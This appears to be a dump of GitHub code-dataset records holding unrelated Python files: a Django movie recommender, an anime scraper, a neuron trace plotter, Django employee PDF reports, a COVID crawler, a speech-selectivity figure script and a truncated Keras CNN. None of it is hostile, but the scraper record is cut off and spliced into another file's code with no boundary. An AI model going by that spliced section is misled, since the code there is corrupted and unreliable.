user_movie_ratings_sorted.drop(user_movie_ratings_sorted.tail(1).index)\n # 3- slice\n most_rated_movies = user_movie_ratings_sorted.iloc[:, :max_number_of_movies]\n return most_rated_movies\n\ndef get_users_who_rate_the_most(most_rated_movies, max_number_of_movies):\n # Get most voting users\n # 1- Count\n most_rated_movies['counts'] = pd.Series(most_rated_movies.count(axis=1))\n # 2- Sort\n most_rated_movies_users = most_rated_movies.sort_values('counts', ascending=False)\n # 3- Slice\n most_rated_movies_users_selection = most_rated_movies_users.iloc[:max_number_of_movies, :]\n most_rated_movies_users_selection = most_rated_movies_users_selection.drop(['counts'], axis=1)\n \n return most_rated_movies_users_selection\n\ndef sort_by_rating_density(user_movie_ratings, n_movies, n_users):\n most_rated_movies = get_most_rated_movies(user_movie_ratings, n_movies)\n most_rated_movies = get_users_who_rate_the_most(most_rated_movies, n_users)\n return most_rated_movies\n \n \ndef bias_genre_rating_dataset(genre_ratings, score_limit_1, score_limit_2):\n biased_dataset = genre_ratings[((genre_ratings['avg_romance_rating'] < score_limit_1 - 0.2) & (genre_ratings['avg_scifi_rating'] > score_limit_2)) | ((genre_ratings['avg_scifi_rating'] < score_limit_1) & (genre_ratings['avg_romance_rating'] > score_limit_2))]\n biased_dataset = pd.concat([biased_dataset[:300], genre_ratings[:2]])\n biased_dataset = pd.DataFrame(biased_dataset.to_records())\n return biased_dataset\n\n'''\n if request.method == 'GET':\n cluster = request.GET.get('cluster', None)\n recommend = request.GET.get('recommend', None)\n con = sqlite3.connect(\"db.sqlite3\")\n cur = con.cursor()\n serializer = ''\n movieDb = Clustering.objects.all()\n movieDb.delete()\n if cluster :\n if cluster == '1' :\n #df = pd.read_sql(\"SELECT * From kmeans\" , con = con)\n cur.execute(\"select * from kmeans\")\n if cluster == '2' :\n #df = pd.read_sql(\"SELECT * From Hierarchical\", con = con)\n cur.execute(\"select * from Hierarchical\")\n if cluster == '3' : \n #df = pd.read_sql(\"SELECT * From EM\", con = con)\n cur.execute(\"select * from EM\")\n \n #print(df)\n rows = cur.fetchall()\n cnt = 0\n for row in rows:\n if(cnt == len(rows)-1):\n break\n userid = int(row[0])+2\n group = int(row[-1])\n profile = list(Profile.objects.filter(user_id = userid).values())\n print(profile[0])\n print(profile[0]['user_id'])\n\n Clustering(id = int(profile[0]['user_id']),occupation=profile[0]['occupation'], gender=profile[0]['gender'],age=int(profile[0]['age']),group=group ).save()\n cnt = cnt+1\n clusters = Clustering.objects.all()\n con.close()\n serializer = ClusteringSerializer(clusters, many=True)\n \n if recommend :\n\n return\n \n return Response(data=serializer.data, status=status.HTTP_200_OK)\n'''","repo_name":"jby3146/bigdata_movie-python-vue-","sub_path":"backend/api/views/recommend_views.py","file_name":"recommend_views.py","file_ext":"py","file_size_in_byte":10418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25676906697","text":"from bs4 import BeautifulSoup as bes\nimport requests, subprocess, pixeldrain, os\n\nclass kusonim:\n def indeed(self):\n self.judul = int(input(\"\"\"\n __ __ _\n / //_/_ _____ ___ ___ (_)_ _ ___\n / ,< / // (_- -1:\n # there's a comment, remove it, and then strip white space\n nextLine = nextLine[:commentInd].strip()\n else:\n # no comment, strip white space\n nextLine = nextLine.strip()\n \n return nextLine\n\n\n\n###############################################################################\ndef loadTraces(traceFile):\n \"\"\"\n load all the traces in traceFile into a dictionary object\n \"\"\"\n global _lineNum\n _lineNum = 0\n traces = []\n try:\n with open(traceFile, 'r') as fIn:\n # first get the number of traces\n line = _getNextLine(fIn)\n numTraces = int(line)\n \n # read in the header info for each trace\n for n in range(numTraces):\n _readTraceHeader(fIn, traces)\n \n # read in the data for each trace\n for trace in traces:\n # first just add a few extra fields to trace\n trace['fileName'] = traceFile\n trace['uniqueName'] = trace['name'] + '_' + traceFile\n # read in data\n _readTraceData(fIn, trace)\n \n except StandardError as err:\n sys.tracebacklimit = 0\n raise IOError('Error reading %s line %d: %s' % \\\n (traceFile, _lineNum, err.message))\n\n return traces\n\n\n\n###############################################################################\ndef _readTraceHeader(fIn, traces):\n \"\"\"\n read a header line from the file and add a new trace to traces and traceNames\n \"\"\"\n # get the next header line\n headerLine = _getNextLine(fIn)\n # split it into its four component parts (will work even if traceName has\n # white space)\n (traceName, units, numT, dT) = headerLine.rsplit(None, 3)\n # add to traces\n traces.append( {'name' : traceName, \\\n 'units' : units, \\\n 'numT' : int(numT), \\\n 'dT' : float(dT), \\\n 'data' : [] } )\n \n\n\n###############################################################################\ndef _readTraceData(fIn, trace):\n \"\"\"\n read the data corresponding to trace from fIn\n \"\"\"\n trace['data'] = \\\n [float(_getNextLine(fIn)) for n in range(trace['numT'])]\n\n\n\n###############################################################################\ndef saveTraces(traces, traceFile):\n \"\"\"\n save all the traces a dictionary object to traceFile\n \"\"\"\n with open(traceFile, 'w') as fOut:\n # write the number of traces\n fOut.write('# number of traces\\n')\n fOut.write('%d\\n' % len(traces))\n \n # write the header information\n fOut.write('# name units numT dt\\n')\n for traceName in traces:\n trace = traces[traceName]\n fOut.write('%s %s %d %g\\n' % \\\n (traceName, trace['units'], trace['numT'], trace['dT']))\n \n # write the trace data\n for traceName in traces:\n fOut.write('#%s\\n' % traceName)\n for val in traces[traceName]['data']:\n fOut.write('%g\\n' % val)\n\n\n\n###############################################################################\ndef plotTrace(trace, dupTraces=None, labelSize=30, titleSize=30, tickSize=24):\n \"\"\"\n plot the trace in a new figure\n \"\"\"\n (dT, tUnits) = scaleTraceTime(trace, 'ms')\n tFactor = dT / trace['dT']\n units = trace['units']\n \n # do any conversions to dT, tUnits based on tUnits and numT?\n t = [dT * n for n in range(trace['numT'])]\n \n xLabel = 'Time (%s)' % tUnits\n yLabel = '%s (%s)' % (trace['name'], units)\n\n if dupTraces:\n # first make overlay plot\n legendName = 'fileName' # or 'uniqueName'\n overlayFig = pyplot.figure()\n titleStr = trace['name'] + ' overlaid'\n for dupNum in range(len(dupTraces)):\n trace2 = dupTraces[dupNum]\n dT2 = trace2['dT'] * tFactor\n units2 = trace2['units']\n t2 = [dT2 * n for n in range(trace2['numT'])]\n plotXY(t2, trace2['data'], '-', color=getColor(dupNum+2), \\\n xLabel=xLabel, yLabel=yLabel, title=titleStr, \\\n legendLabel=trace2[legendName], figure=overlayFig, linewidth=2)\n \n titleStr = trace['name'] + ' overlaid'\n plotXY(t, trace['data'], '-', color=getColor(1), \\\n xLabel=xLabel, yLabel=yLabel, title=titleStr, \\\n legendLabel=trace[legendName], figure=overlayFig)\n pyplot.legend(loc=0)\n \n # make difference plots\n numDiff = 0\n diffFig = pyplot.figure()\n titleStr = trace['name'] + ' difference'\n for dupNum in range(len(dupTraces)):\n trace2 = dupTraces[dupNum]\n numDiff += 1\n traceDiff = [y2 - y for (y, y2) in zip(trace['data'], trace2['data'])]\n numT = min(trace['numT'], trace2['numT'])\n plotXY(t[:numT], traceDiff, '-', color=getColor(dupNum + 2), \\\n xLabel=xLabel, yLabel=yLabel, title=titleStr, \\\n legendLabel=trace2[legendName], figure=diffFig)\n if numDiff > 0:\n pyplot.legend(loc=0)\n else:\n plotXY(t, trace['data'], 'k-', \\\n xLabel=xLabel, yLabel=yLabel, title=trace['name'])\n\n\n\n###############################################################################\ndef scaleTraceTime(originalTrace, originalUnits):\n \"\"\"\n return dT and tUnits in a convenient unit\n \"\"\"\n dT = originalTrace['dT']\n numT = originalTrace['numT']\n tFinal = dT * (numT - 1)\n \n upConvert = \\\n { \\\n 'ns' : {'unit': 'us', 'factor' : 1000}, \\\n 'μs' : {'unit': 'ms', 'factor' : 1000}, \\\n 'us' : {'unit': 'ms', 'factor' : 1000}, \\\n 'ms' : {'unit': 's', 'factor' : 1000}, \\\n 's' : {'unit': 'm', 'factor' : 60},\\\n 'm' : {'unit': 'h', 'factor' : 60},\\\n 'h' : {'unit': 'd', 'factor' : 24}\\\n }\n downConvert = \\\n { \\\n 'us' : {'unit': 'ns', 'factor' : 1000}, \\\n 'μs' : {'unit': 'ns', 'factor' : 1000}, \\\n 'ms' : {'unit': 'us', 'factor' : 1000}, \\\n 's' : {'unit': 'ms', 'factor' : 1000}, \\\n 'm' : {'unit': 's', 'factor' : 60},\\\n 'h' : {'unit': 'm', 'factor' : 60},\\\n 'd' : {'unit': 'h', 'factor' : 24}\\\n }\n \n tUnits = originalUnits\n if tFinal >= 1:\n while tUnits in upConvert:\n # upconvert as long as the result leaves tFinal >= 1\n factor = upConvert[tUnits]['factor']\n tFinal = tFinal / factor\n if tFinal >= 1:\n dT = dT / factor\n tUnits = upConvert[tUnits]['unit']\n else:\n break\n else:\n while tUnits in downConvert and tFinal < 1:\n # downconvert as long as tFinal < 1\n factor = downConvert[tUnits]['factor']\n tFinal = tFinal * factor\n dT = dT * factor\n tUnits = downConvert[tUnits]['unit']\n return (dT, tUnits) \n\n\n\n###############################################################################\ndef getColor(colorNum):\n colors = [ \\\n (0, 0, 0 ), \\\n (0, 0, 255), \\\n (255, 0, 0 ), \\\n (0, 255, 0 ), \\\n (255, 0, 182), \\\n (0, 83, 0 ), \\\n (255, 211, 0 ), \\\n (0, 159, 255), \\\n (154, 77, 66 ), \\\n (0, 255, 190), \\\n (120, 63, 193), \\\n (31, 150, 152), \\\n (255, 172, 253), \\\n (177, 204, 113), \\\n (241, 8, 92 ), \\\n (254, 143, 66 ), \\\n (221, 0, 255), \\\n (32, 26, 1 ), \\\n (114, 0, 85 ), \\\n (118, 108, 149), \\\n (2, 173, 36 ), \\\n (200, 255, 0 ), \\\n (136, 108, 0 ), \\\n (255, 183, 159), \\\n (133, 133, 103), \\\n (161, 3, 0 ), \\\n (20, 249, 255), \\\n (0, 71, 158), \\\n (220, 94, 147), \\\n (147, 212, 255), \\\n (0, 76, 255) \\\n ]\n # get desired color and scale it to float in interval [0, 1]\n return tuple([ c / 255.0 for c in colors[colorNum] ])\n\n\n\n###############################################################################\ndef findDuplicateTraces(traces):\n \n def _isDup(t1, t2):\n if t1['name'] == t2['name'] or \\\n t1['name'] + '_0' == t2['name'] or \\\n t1['name'] == t2['name'] + '_0':\n return True\n else:\n return False\n \n duplicates = []\n noDupTraces = []\n while traces:\n trace = traces.pop(0)\n dups = [t for t in traces if _isDup(t, trace)]\n for t in dups:\n traces.remove(t)\n noDupTraces.append(trace)\n duplicates.append(dups)\n \n return (noDupTraces, duplicates)\n\n\n\n###############################################################################\ndef plotTraces(traces):\n (traces, duplicates) = findDuplicateTraces(traces)\n \n for (trace, dups) in zip(traces, duplicates):\n # plot each trace\n plotTrace(trace, dups)\n \n # wait until figures are closed\n pyplot.show()\n\n\n\n###############################################################################\ndef _parseArguments():\n arguments = sys.argv\n if len(arguments) < 2:\n print(_usageStr)\n sys.tracebacklimit = 1\n raise TypeError('Incorrect number of arguments.')\n\n traceFiles = arguments[1:]\n \n return traceFiles\n\n\n \n###############################################################################\nif __name__ == \"__main__\":\n traceFiles = _parseArguments()\n \n # load all the traces\n traces = []\n for traceFile in traceFiles:\n traces.extend( loadTraces(traceFile) )\n \n plotTraces(traces)\n\n sys.exit(0)\n","repo_name":"TedBrookings/fitneuron","sub_path":"scripts/neuron_plot_trace.py","file_name":"neuron_plot_trace.py","file_ext":"py","file_size_in_byte":9829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34122984946","text":"from django.contrib.auth.models import User\nfrom django.urls import reverse_lazy\nfrom django.views.generic import UpdateView, DeleteView, CreateView, TemplateView\nfrom django.views.generic.list import ListView\nfrom apps.funcionarios.models import Funcionario\nimport io\nfrom django.http import FileResponse, HttpResponse\nfrom reportlab.pdfgen import canvas\nimport xhtml2pdf.pisa as pisa\nfrom django.template.loader import get_template\nfrom django.views import View\n\nclass FuncionariosList(ListView):\n model = Funcionario\n # paginate_by = 10\n\n def get_queryset(self):\n #pegar o is do usuario\n #pelo id buscar a empresa\n user_id = self.request.user.id\n empresa_logada = Funcionario.objects.get(user=user_id).empresa_id\n return Funcionario.objects.filter(empresa=empresa_logada)\n\nclass FuncionarioEdit(UpdateView):\n model = Funcionario\n fields = ['nome', 'departamentos']\n\nclass FuncionarioDelete(DeleteView):\n model = Funcionario\n #reverse_lazy não deixa concatenar a url\n success_url = reverse_lazy('list_funcionarios')\n\nclass FuncionarioCreate(CreateView):\n model = Funcionario\n fields = ['nome', 'departamentos']\n\n def form_valid(self, form):\n funcionario = form.save(commit=False)\n username = ''\n for func in funcionario.nome.split(' '):\n username = username + func\n funcionario.empresa = self.request.user.funcionario.empresa\n funcionario.user = User.objects.create(username=username)\n funcionario.save()\n\n return super(FuncionarioCreate, self).form_valid(form)\n\ndef relatorio_funcionarios(request):\n # Create a file-like buffer to receive PDF data.\n response = HttpResponse(content_type='application/pdf')\n #Content-Disposition serve para baixar o arquivo no pc quando clicado\n response['Content-Disposition'] = 'attachment; filename=\"mypdf.pdf\"'\n\n buffer = io.BytesIO()\n # Create the PDF object, using the buffer as its \"file.\"\n p = canvas.Canvas(buffer)\n\n #escrever no relatorio usando coordenadas x, y\n p.drawString(200, 810, \"Relatório de Funcionários.\")\n p.drawString(0, 800, \"_\" * 200)\n\n funcionarios = Funcionario.objects.filter(empresa=request.user.funcionario.empresa)\n str = 'Nome: %s | Hora Extra: %f'\n y = 750\n for funcionario in funcionarios:\n p.drawString(10, y, str%(funcionario.nome, funcionario.total_horas_extra))\n y -= 20\n p.showPage()\n p.save()\n\n pdf = buffer.getvalue()\n buffer.close()\n response.write(pdf)\n\n return response\n\n\nclass Render:\n\n @staticmethod\n def render(path: str, params: dict, filename: str):\n template = get_template(path)\n html = template.render(params)\n response = io.BytesIO()\n pdf = pisa.pisaDocument(\n io.BytesIO(html.encode('UTF-8')), response)\n if not pdf.err:\n response = HttpResponse(\n response.getvalue(), content_type='application/pdf')\n response['Content-Disposition'] = 'attachment;filename=%s.pdf' %filename\n return response\n else:\n return HttpResponse(\"Error Rendering PDF\", status=400)\n\nclass Pdf(View):\n\n def get(self, request):\n params = {\n 'today': 'Variavel today',\n 'sales': 'Variavel sales',\n 'request': request\n }\n return Render.render('funcionarios/relatorio.html', params, 'myfile')\n\n\nclass PdfDebug(TemplateView):\n template_name = 'funcionarios/relatorio.html'\n","repo_name":"gelhen/gestao_rh","sub_path":"apps/funcionarios/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25955227553","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time, requests, re, os\n\n\ndef getNDHNumbers(url):\n headers = { 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' }\n \n remove_array = [\"\", \"\", \"\", \"\", \" \", \"\\n\"]\n \n num_pattern_T = re.compile(r\"Infektionen:([0-9]{1,})\")\n num_pattern_R = re.compile(r\"gelten als genesen:([0-9]{1,})\")\n num_pattern_D = re.compile(r\"[vV]erstorben:([0-9]{1,})\")\n num_pattern_H = re.compile(r\"stationär\\sbehandelt:([0-9]{1,})\")\n \n try:\n r = requests.get(url, headers=headers, allow_redirects=True, timeout=5.0)\n s = r.text\n \n for entry in remove_array:\n s = s.replace(entry, \"\")\n \n ps1 = num_pattern_T.findall( s )\n ps2 = num_pattern_R.findall( s )\n ps3 = num_pattern_D.findall( s )\n ps4 = num_pattern_H.findall( s )\n \n num_t = int(ps1[0]) if (len(ps1) >= 1) else -1\n num_r = int(ps2[0]) if (len(ps2) >= 1) else -1\n num_d = int(ps3[0]) if (len(ps3) >= 1) else -1\n num_h = int(ps4[0]) if (len(ps4) >= 1) else -1\n num_s = -1\n \n return (num_t, num_r, num_d, num_h, num_s)\n \n except:\n return False \n\n\nif __name__ == \"__main__\":\n \n DATAFILE = os.path.dirname(os.path.realpath(__file__)) + \"/../data/cases_ndh.csv\"\n URL = 'https://www.landratsamt-nordhausen.de/informationen-coronavirus.html'\n \n # do the request\n num_latest = getNDHNumbers(URL)\n \n if (num_latest != False) and (num_latest[0] > -1):\n \n # get old values\n with open(DATAFILE, 'r') as df:\n raw_data = df.read().splitlines()\n last_values = raw_data[-1].split(\",\")[1:6]\n \n # check for changes\n value_changed = False\n for i in enumerate(last_values):\n if ( int(i[1]) != num_latest[i[0]] ):\n if ( num_latest[i[0]] != -1 ):\n value_changed = True\n \n if value_changed:\n # write new csv data\n f = open(DATAFILE, 'a')\n f.write(\"%i,%i,%i,%i,%i,%i,%s\\n\" % (int(time.time()), num_latest[0], num_latest[1], num_latest[2], num_latest[3], num_latest[4], URL))\n f.close()\n","repo_name":"micb25/corona-jena","sub_path":"crawler/crawler_ndh.py","file_name":"crawler_ndh.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"38456916469","text":"'''\nFigure of firing rate based selectivity indices for VOT and FT\n'''\nimport os\nimport sys\nimport studyparams\nimport figparams\nimport numpy as np\nimport pandas as pd\nfrom jaratoolbox import settings\nfrom jaratoolbox import extraplots\nfrom scipy import stats\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nfrom importlib import reload\nreload(studyparams)\n\nSAVE_FIGURE = 1\noutputDir = 'C:\\\\Users\\\\jenny\\\\tmp'\nFIGNAME = 'selectivityIndices'\nfigFormat = 'svg' # 'pdf' or 'svg'\nfigSize = [6, 4] # In inches\n\n# -- Load data --\nfigDataFile = 'data_selectivity_indices.npz'\nfigDataDir = os.path.join(settings.FIGURES_DATA_PATH, studyparams.STUDY_NAME, FIGNAME)\nfigDataFullPath = os.path.join(figDataDir, figDataFile)\nfigData = np.load(figDataFullPath, allow_pickle = True)\n#databaseDir = os.path.join(settings.DATABASE_PATH, studyparams.STUDY_NAME)\n#dbPath = os.path.join(databaseDir, 'fulldb_paspeech_speech_tuning_allcells.h5')\n#audCtxAreas = ['Primary auditory area','Dorsal auditory area', 'Ventral auditory area']\n\n\nPANELS = [0] # Plot panel i if PANELS[i]==1\n\nfontSizeLabels = figparams.fontSizeLabels\nfontSizeTicks = figparams.fontSizeTicks\nfontSizePanel = figparams.fontSizePanel\n\nlabelPosX = [0.07, 0.48, 0.7] # Horiz position for panel labels\nlabelPosY = [0.9, 0.48] # Vert position for panel labels\n\n# -- Assigned colors (defined in figparams) --\naudPColor = figparams.colors['audP']\naudDColor = figparams.colors['audD']\naudVColor = figparams.colors['audV']\n\n\nbestFtSIbyArea = []\nbestVotSIbyArea = []\nspeechResponsiveByArea = []\nexcludeCellsbyArea = []\n\nfor indArea, thisArea in enumerate(figData['audCtxAreas']):\n bestFtSIbyArea.append(figData['bestSelectivityIndexFt'][figData['recordingAreaName'] == thisArea])\n bestVotSIbyArea.append(figData['bestSelectivityIndexVot'][figData['recordingAreaName'] == thisArea])\n speechResponsiveByArea.append(figData['speechResponsive'][figData['recordingAreaName'] == thisArea])\n excludeCellsbyArea.append(figData['excludeCells'][figData['recordingAreaName']==thisArea])\n\n\n## exclude low spike count cells\nfor indArea, thisArea in enumerate(figData['audCtxAreas']):\n bestFtSIbyArea[indArea] = bestFtSIbyArea[indArea][~excludeCellsbyArea[indArea]]\n bestVotSIbyArea[indArea] = bestVotSIbyArea[indArea][~excludeCellsbyArea[indArea]]\n speechResponsiveByArea[indArea] = speechResponsiveByArea[indArea][~excludeCellsbyArea[indArea]]\n\n\n# -- if group difference, test individual comparisons:\n## all cells:\nif figData['pValKruskalBestVOT'] < 0.05:\n ustat, pValmannU_votAudPvsAudD = stats.mannwhitneyu(bestVotSIbyArea[0], bestVotSIbyArea[1])\n ustat, pValmannU_votAudPvsAudV = stats.mannwhitneyu(bestVotSIbyArea[0], bestVotSIbyArea[2])\n ustat, pValmannU_votAudDvsAudV = stats.mannwhitneyu(bestVotSIbyArea[1], bestVotSIbyArea[2])\n\nif figData['pValKruskalBestFT'] < 0.05:\n ustat, pValmannU_ftAudPvsAudD = stats.mannwhitneyu(bestFtSIbyArea[0], bestFtSIbyArea[1])\n ustat, pValmannU_ftAudPvsAudV = stats.mannwhitneyu(bestFtSIbyArea[0], bestFtSIbyArea[2])\n ustat, pValmannU_ftAudDvsAudV = stats.mannwhitneyu(bestGtSIbyArea[1], bestFtSIbyArea[2])\n\n## responsive cells\nif figData['pValKruskalBestVOT'] < 0.05:\n ustat, pValmannU_votAudPvsAudD = stats.mannwhitneyu(bestVotSIbyArea[0][speechResponsiveByArea[0]],\n bestVotSIbyArea[1][speechResponsiveByArea[1]])\n ustat, pValmannU_votAudPvsAudV = stats.mannwhitneyu(bestVotSIbyArea[0][speechResponsiveByArea[0]],\n bestVotSIbyArea[2][speechResponsiveByArea[2]])\n ustat, pValmannU_votAudDvsAudV = stats.mannwhitneyu(bestVotSIbyArea[1][speechResponsiveByArea[1]],\n bestVotSIbyArea[2][speechResponsiveByArea[2]])\n\nif figData['pValKruskalBestFT'] < 0.05:\n ustat, pValmannU_ftAudPvsAudD = stats.mannwhitneyu(bestFtSIbyArea[0][speechResponsiveByArea[0]],\n bestFtSIbyArea[1][speechResponsiveByArea[1]])\n ustat, pValmannU_ftAudPvsAudV = stats.mannwhitneyu(bestFtSIbyArea[0][speechResponsiveByArea[0]],\n bestFtSIbyArea[2][speechResponsiveByArea[2]])\n ustat, pValmannU_ftAudDvsAudV = stats.mannwhitneyu(bestFtSIbyArea[1][speechResponsiveByArea[1]],\n bestFtSIbyArea[2][speechResponsiveByArea[2]])\n\n\n#fig1 = plt.gcf()\n#fig1.clf()\nfig1 = plt.figure()\ngsMain = gridspec.GridSpec(3,2)\ngsMain.update(left=0.08, right=0.98, top=0.95, bottom=0.1, wspace=0.4, hspace=0.4)\n\nbins = np.arange(0,1,0.025)\nyMax = 15\n\n## -- Plot VOT results --\nax1 = plt.subplot(gsMain[0, 0])\nplt.hist(bestVotSIbyArea[1][speechResponsiveByArea[1]], bins = bins, color = audDColor)\nplt.ylim([0, yMax])\naudD_votmedian = np.nanmedian(bestVotSIbyArea[1][speechResponsiveByArea[1]])\n#plt.plot([audD_votmedian, audD_votmedian], [0,yMax], color = 'k', ls = '--')\nax1.text(audD_votmedian, yMax-2, 'V', fontSize = fontSizeLabels)\n# ax.text(starsXvals, yPos, starMarker, fontsize=fontSize, va='center', ha='center', clip_on=False)\nplt.title('VOT Selectivity', fontsize=fontSizeLabels, fontweight='bold')\nax1.annotate(f'med = {np.round(audD_votmedian,2)}', xy=(0.6, 10), xycoords = 'data', fontsize =\n fontSizeTicks)\n\nax2 = plt.subplot(gsMain[1, 0], sharex = ax1)\nplt.hist(bestVotSIbyArea[0][speechResponsiveByArea[0]], bins = bins, color = audPColor)\nplt.ylim([0, yMax])\naudP_votmedian = np.nanmedian(bestVotSIbyArea[0][speechResponsiveByArea[0]])\n#plt.plot([audP_votmedian, audP_votmedian], [0,yMax], color = 'k', ls = '--')\nax2.text(audP_votmedian, yMax-2, 'V', fontSize = fontSizeLabels)\nplt.ylabel('Cell Count', fontsize = fontSizeTicks)\nax2.annotate(f'med = {np.round(audP_votmedian,2)}', xy=(0.6, 10), xycoords = 'data', fontsize =\n fontSizeTicks)\n\nax3 = plt.subplot(gsMain[2, 0], sharex = ax1)\nplt.hist(bestVotSIbyArea[2][speechResponsiveByArea[2]], bins = bins, color = audVColor)\nplt.ylim([0, yMax])\naudV_votmedian = np.nanmedian(bestVotSIbyArea[2][speechResponsiveByArea[2]])\n#plt.plot([audV_votmedian, audV_votmedian], [0,yMax], color = 'k', ls = '--')\nax3.text(audV_votmedian, yMax-2, 'V', fontSize = fontSizeLabels)\n#ax3.annotate(\"\", xy = (audV_votmedian, yMax-2), xycoords = 'data', arrowprops = dict(arrowstyle = \"-|>\", connectionstyle = \"angle3, angleA = 0, angleB=90\"))\nplt.xlabel('VOT Selectivity Index', fontsize=fontSizeTicks)\nax3.annotate(f'med = {np.round(audV_votmedian,2)}', xy=(0.6, 10), xycoords = 'data', fontsize =\n fontSizeTicks)\n\n# -- Plot FT results --\nax4 = plt.subplot(gsMain[0, 1])\nplt.hist(bestFtSIbyArea[1][speechResponsiveByArea[1]], bins = bins, color = audDColor)\nplt.ylim([0, yMax])\naudD_ftmedian = np.nanmedian(bestFtSIbyArea[1][speechResponsiveByArea[1]])\n#plt.plot([audD_ftmedian, audD_ftmedian], [0,yMax], color = 'k', ls = '--')\nax4.text(audD_ftmedian, yMax-2, 'V', fontSize = fontSizeLabels)\nplt.title('FT Selectivity', fontsize=fontSizeLabels, fontweight='bold')\nax4.annotate(f'med = {np.round(audD_ftmedian,2)}', xy=(0.6, 10), xycoords = 'data', fontsize =\n fontSizeTicks)\n\nax5 = plt.subplot(gsMain[1, 1], sharex = ax1)\nplt.hist(bestFtSIbyArea[0][speechResponsiveByArea[0]], bins = bins, color = audPColor)\nplt.ylim([0, yMax])\naudP_ftmedian = np.nanmedian(bestFtSIbyArea[0][speechResponsiveByArea[0]])\n#plt.plot([audP_ftmedian, audP_ftmedian], [0,yMax], color = 'k', ls = '--')\nax5.text(audP_ftmedian, yMax-2, 'V', fontSize = fontSizeLabels)\nax5.annotate(f'med = {np.round(audP_ftmedian,2)}', xy=(0.6, 10), xycoords = 'data', fontsize =\n fontSizeTicks)\n\nax6 = plt.subplot(gsMain[2, 1], sharex = ax1)\nplt.hist(bestFtSIbyArea[2][speechResponsiveByArea[2]], bins = bins, color = audVColor)\nplt.ylim([0, yMax])\naudV_ftmedian = np.nanmedian(bestFtSIbyArea[2][speechResponsiveByArea[2]])\n#plt.plot([audV_ftmedian, audV_ftmedian], [0,yMax], color = 'k', ls = '--')\nax6.text(audD_ftmedian, yMax-2, 'V', fontSize = fontSizeLabels)\nplt.xlabel('FT Selectivity Index', fontsize=fontSizeTicks)\nax6.annotate(f'med = {np.round(audV_ftmedian,2)}', xy=(0.6, 10), xycoords = 'data', fontsize =\n fontSizeTicks)\n\nax1.annotate('AudD', xy=(0.48, 0.82), xycoords='figure fraction', fontsize=fontSizeLabels,\n fontweight='bold')\nax2.annotate('AudP', xy=(0.48, 0.51), xycoords='figure fraction', fontsize=fontSizeLabels,\n fontweight='bold')\nax3.annotate('AudV', xy=(0.48, 0.20), xycoords='figure fraction', fontsize=fontSizeLabels,\n fontweight='bold')\n\nplt.show()\n\nif SAVE_FIGURE:\n extraplots.save_figure(FIGNAME, figFormat, figSize, outputDir)\n #extraplots.save_figure('selectivityIndices_dontExcludelowSpikers', figFormat, figSize, outputDir)\n","repo_name":"sjara/jarapubs","sub_path":"2022paspeech/old_figure_speech_selectivity.py","file_name":"old_figure_speech_selectivity.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21720831295","text":"from pandas import Series,DataFrame\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom numpy import newaxis\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Flatten, BatchNormalization, Dropout, LeakyReLU, PReLU, MaxoutDense,ZeroPadding2D\r\nfrom keras.callbacks import EarlyStopping,ModelCheckpoint,ReduceLROnPlateau\r\nfrom keras import metrics,regularizers\r\nimport keras.backend as K\r\nimport keras\r\nimport tensorflow\r\nimport h5py\r\nimport sys\r\ntestDATA=sys.argv[1]\r\nfilepath='best_model.h5'\r\ncallbacks = [\r\n EarlyStopping(monitor='val_acc', patience=30, verbose=1),\r\n ModelCheckpoint(filepath, monitor='val_acc', save_best_only=True, verbose=1),\r\n ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=0, mode='auto', epsilon=0.0001, cooldown=0, min_lr=0)\r\n]\r\n\r\nDATA = np.genfromtxt(testDATA,delimiter=',',dtype=None)\r\nDATA=DATA[1:,:]\r\n\r\ndata=np.zeros((len(DATA),48,48,1))\r\nfor i in range(len(DATA)):\r\n\tdata[i,:,:,0]=np.fromstring(DATA[i,1], dtype=int, sep=' ').reshape((48,48))\r\n\tif np.std(data[i,:,:,0]) !=0:\r\n\t\tdata[i,:,:,0]=data[i,:,:,0]/np.std(data[i,:,:,0])\r\n\r\n\r\nlabel=np.zeros((len(DATA),7))\r\nlabel_buf=DATA[:,0].astype(int)\r\nfor i in range(len(DATA)):\r\n\tlabel[i,label_buf[i]]=1\r\n\r\n\r\nDROPOUT=0.3\r\n\r\nmodel = Sequential()\r\n\r\nmodel.add(ZeroPadding2D((1,1),input_shape=(48,48,1)))\r\nmodel.add(Conv2D(32,(3,3),strides=(1, 1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(ZeroPadding2D((1,1)))\r\nmodel.add(Conv2D(32,(3,3),strides=(1, 1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(MaxPooling2D((2,2),strides=(2,2)))\r\nmodel.add(Dropout(DROPOUT))\r\n\r\nmodel.add(ZeroPadding2D((1,1)))\r\nmodel.add(Conv2D(64,(3,3),strides=(1, 1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(ZeroPadding2D((1,1)))\r\nmodel.add(Conv2D(64,(3,3),strides=(1, 1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(MaxPooling2D((2,2),strides=(2,2)))\r\nmodel.add(Dropout(DROPOUT))\r\n\r\nmodel.add(ZeroPadding2D((1,1)))\r\nmodel.add(Conv2D(64,(3,3),strides=(1, 1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(ZeroPadding2D((1,1)))\r\nmodel.add(Conv2D(64,(3,3),strides=(1, 